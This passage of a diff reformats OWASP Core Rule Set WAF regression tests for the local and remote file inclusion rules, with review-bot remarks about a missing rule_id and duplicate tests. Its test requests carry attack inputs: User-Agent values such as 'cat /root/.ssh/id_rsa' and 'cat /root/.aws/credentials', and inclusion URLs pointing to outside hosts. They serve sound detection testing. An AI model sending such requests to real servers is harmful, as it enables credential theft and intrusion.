zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /etc/apache2/apache2/apache2.conf" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 3 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /proc/sys/kernel/randomize_va_space" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /proc/sys/kernel/randomize_va_space" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 4 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /proc/net/tcp" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-5 + - input: + dest_addr: 127.0.0.1 + headers: + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /proc/net/tcp" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 5 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /root/.aws/credentials" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /root/.aws/credentials" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 6 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /root/.ssh/id_rsa" - method: GET - port: 80 - uri: "/get" - version: 
"HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /root/.ssh/id_rsa" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 7 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/root/.aws/credentials" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/root/.aws/credentials" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 8 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - 
Proxy-Connection: keep-alive - User-Agent: "/proc/sys/kernel/randomize_va_space" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/proc/sys/kernel/randomize_va_space" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 9 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/proc/net/tcp" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/proc/net/tcp" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 10 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: 
gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/root/.ssh/id_rsa" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/root/.ssh/id_rsa" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml index caccac5ab..8b0a1c6f3 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml 
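Review bot: The new side of this hunk removes `enabled` and `name` from `meta` but adds no top-level `rule_id`, whereas the 930130.yaml hunk below adds `+rule_id: 930130` at exactly that position. Once `test_title: 930121-1` becomes `test_id: 1`, the rule number no longer appears anywhere in the file, so a runner or an override file that refers to tests by `<rule>-<id>` names can only recover it from the file name; if the new schema expects `rule_id`, the line `rule_id: 930121` belongs after the `meta:` mapping here, and the same applies to the 931100, 931110 and 931120 hunks, unless a later patch in the series supplies it. Separately, test_id 1 and test_id 6 on the new side appear byte-identical (same `User-Agent: "cat /root/.ssh/id_rsa"`, same output), so the renumbering is a natural moment to drop or differentiate the duplicate.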
@@ -2,38 +2,35 @@ meta: author: "Andrew Howe, azurit" description: "None" - enabled: true - name: "930130.yaml" +rule_id: 930130 tests: - - test_title: 930130-1 + - test_id: 1 desc: "LFI via URI: /sys" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/sys/class" - version: "HTTP/1.1" - output: - log_contains: id "930130" - - test_title: 930130-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/sys/class" + version: "HTTP/1.1" + output: + log_contains: id "930130" + - test_id: 2 desc: "LFI via URI: /proc" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/proc/interrupts" - version: "HTTP/1.1" - output: - log_contains: id "930130" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/proc/interrupts" + version: "HTTP/1.1" + output: + log_contains: id "930130" diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml index 11fc083e5..368dd5005 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml 
@@ -2,27 +2,24 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 931100.yaml tests: - - test_title: 931100-1 + - test_id: 1 desc: Remote File Inclusion Attack (931100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php" - version: "HTTP/1.1" - output: - log_contains: id "931100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php" + version: "HTTP/1.1" + output: + log_contains: id "931100" diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml index dbb3b8fb5..d5983803d 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml 
@@ -2,69 +2,64 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 931110.yaml tests: - - test_title: 931110-1 + - test_id: 1 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" - version: "HTTP/1.1" - output: - log_contains: id "931110" - - test_title: 931110-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" + version: "HTTP/1.1" + output: + log_contains: id "931110" + - test_id: 2 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar" - version: "HTTP/1.1" - output: - log_contains: id "931110" - - test_title: 931110-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar" + version: "HTTP/1.1" + output: + log_contains: id "931110" + - test_id: 3 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" - version: "HTTP/1.1" - output: - log_contains: id "931110" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" + version: "HTTP/1.1" + output: + log_contains: id "931110" diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml index 44e910d55..5a4050483 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml 
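Review bot: test_id 3 on the new side appears byte-identical to test_id 1 (same headers, same `uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar"`, same `log_contains: id "931110"`), so it adds no coverage for the rule. Since this commit already renumbers the tests, it is the point at which to either remove the duplicate or give it a distinct input; if any override file references `931110-3` by name, that reference would need the matching update.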
@@ -2,134 +2,124 @@ meta: author: "studersi, azurit" description: None - enabled: true - name: 931120.yaml tests: - - test_title: 931120-1 + - test_id: 1 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=file?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=file?" + version: HTTP/1.1 + output: + log_contains: id "931120" + - test_id: 2 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftp?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-3 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftp?" + version: HTTP/1.1 + output: + log_contains: id "931120" + - test_id: 3 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftps?" 
- version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-4 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftps?" + version: HTTP/1.1 + output: + log_contains: id "931120" + - test_id: 4 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-5 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http?" + version: HTTP/1.1 + output: + log_contains: id "931120" + - test_id: 5 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-6 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https?" 
+ version: HTTP/1.1 + output: + log_contains: id "931120" + - test_id: 6 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-7 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar?" + version: HTTP/1.1 + output: + log_contains: id "931120" + - test_id: 7 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar?foo=bar" - version: HTTP/1.1 - output: - no_log_contains: id "931120" - - test_title: 931120-8 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar?foo=bar" + version: HTTP/1.1 + output: + no_log_contains: id "931120" + - test_id: 8 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar&foo=bar" - version: HTTP/1.1 - output: - no_log_contains: id "931120" + - 
input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar&foo=bar" + version: HTTP/1.1 + output: + no_log_contains: id "931120" diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml index 36542f7d3..56524bf51 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml 
@@ -2,358 +2,334 @@ meta: author: "studersi, azurit" description: None - enabled: true - name: 931130.yaml tests: - - test_title: 931130-1 + - test_id: 1 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=file://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=file://foo.bar" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 2 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftp://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-3 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftp://foo.bar" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 3 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftps://foo.bar" - version: HTTP/1.1 - 
output: - log_contains: id "931130" - - test_title: 931130-4 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftps://foo.bar" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 4 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-5 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://foo.bar" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 5 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-6 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 6 desc: Partial match stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: 
"OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://evilexample.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-7 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://evilexample.com/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 7 desc: Mismatching domains stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com.evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-8 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com.evil.com/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 8 desc: Mismatching ports stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: 